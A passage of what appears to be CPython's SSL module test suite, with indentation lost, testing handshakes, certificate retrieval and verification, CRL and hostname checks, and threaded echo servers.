ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
@support.requires_resource('network')
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
# bpo-44229, bpo-43855, bpo-44237, and bpo-33450:
# Ignore spurious EPROTOTYPE returned by write() on macOS.
# See also http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
if e.errno != errno.EPROTOTYPE and sys.platform != "darwin":
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
